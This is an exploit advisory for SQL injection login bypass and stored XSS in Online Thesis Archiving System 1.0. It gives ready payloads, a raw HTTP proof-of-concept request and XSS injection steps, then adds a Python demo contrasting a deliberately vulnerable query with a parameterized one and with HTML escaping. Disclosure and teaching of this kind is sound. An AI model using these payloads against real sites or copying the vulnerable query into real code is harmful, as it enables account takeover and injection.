
CVE-2021-45334: Online Thesis Archiving System 1.0 SQL Injection

Sourcecodester Online Thesis Archiving System 1.0 is vulnerable to SQL Injection. An attacker can bypass admin authentication and gain access to the admin panel using SQL Injection.

# Exploit Title: Online Thesis Archiving System 1.0 - SQLi Authentication Bypass & Stored (XSS)
# Exploit Author: Yehia Elghaly (YME)
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15083/online-thesis-archiving-system-using-phpoop-free-source-code.html
# Version: Online Thesis Archiving System 1.0
# Tested on: Windows, xampp
# CVE: N/A

- Description: SQLi Authentication Bypass

SQL Injection vulnerability exists in Online Thesis Archiving System 1.0. An admin account takeover exists with the payload:

admin' #
admin' or '1'='1

PoC:

POST /otas/admin/login.php HTTP/1.1
Host: 192.168.113.130
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Origin: http://192.168.113.130
DNT: 1
Connection: close
Referer: http://192.168.113.130/otas/admin/login.php
Cookie: PHPSESSID=0jsudph494kpt2a5jvbvdvsrsc
Upgrade-Insecure-Requests: 1

username=admin' #&password=admin' #

- Description: Stored Cross Site Scripting (XSS)

Stored Cross Site Scripting (XSS) exists in Online Thesis Archiving System 1.0.

Steps:
1- Go to (http://localhost/otas/admin/?page=departments) and (http://localhost/otas/admin/?page=curriculum)
2- Add new (curriculum) or (department)
3- Insert your payload <script>("xssyf")</script>
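The two bugs above come from the same root cause family: untrusted form input is concatenated into a query (the login bypass) or echoed into HTML unencoded (the stored XSS). The following is an added example, not code from the advisory or from Sourcecodester; it reconstructs the vulnerable login pattern the bypass relies on next to a parameterized version, and shows output encoding for the stored field. The table name, column names and function names are assumptions, and it uses SQLite rather than MySQL, so the advisory's `admin' #` payload (MySQL `#` comment) is demonstrated with the SQLite-equivalent `admin'--` alongside the `admin' or '1'='1` payload, which works in both.

```python
import html
import sqlite3


def make_db():
    """Constructed sample database: one admin row. The schema is an assumption
    about what the application's user table looks like, not taken from OTAS."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    # Plaintext password only to keep the demo short; a real app stores a hash.
    conn.execute(
        "INSERT INTO users (username, password) VALUES (?, ?)", ("admin", "S3cret!")
    )
    conn.commit()
    return conn


def vulnerable_login(conn, username, password):
    """String-built query: the pattern the advisory's bypass exploits.
    Returns the matched user id, or None if no row matched / the SQL broke."""
    sql = (
        "SELECT id FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.OperationalError:
        # Malformed SQL (e.g. MySQL-only '#' comment under SQLite); still an
        # injection symptom, but no bypass on this engine.
        return None
    return row[0] if row else None


def safe_login(conn, username, password):
    """Parameterized query: input is bound as data and never parsed as SQL,
    so the same payloads simply fail to match any row."""
    row = conn.execute(
        "SELECT id FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def render_department_name(name):
    """Output-encode a stored value before placing it in HTML, so a stored
    payload such as the advisory's <script>("xssyf")</script> renders as text."""
    return "<td>" + html.escape(name, quote=True) + "</td>"


if __name__ == "__main__":
    db = make_db()
    p = "admin' or '1'='1"
    print("vulnerable, tautology payload:", vulnerable_login(db, p, p))
    print("vulnerable, comment payload:  ", vulnerable_login(db, "admin'--", "x"))
    print("parameterized, same payload:  ", safe_login(db, p, p))
    print("parameterized, real creds:    ", safe_login(db, "admin", "S3cret!"))
    print(render_department_name('<script>("xssyf")</script>'))
```

The tautology payload works in the string-built query because `AND` binds tighter than `OR`, so `username = 'admin' OR ('1'='1' AND password = '...')` is true whenever the admin row exists; the comment payload simply truncates the password check. Neither touches the parameterized query.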
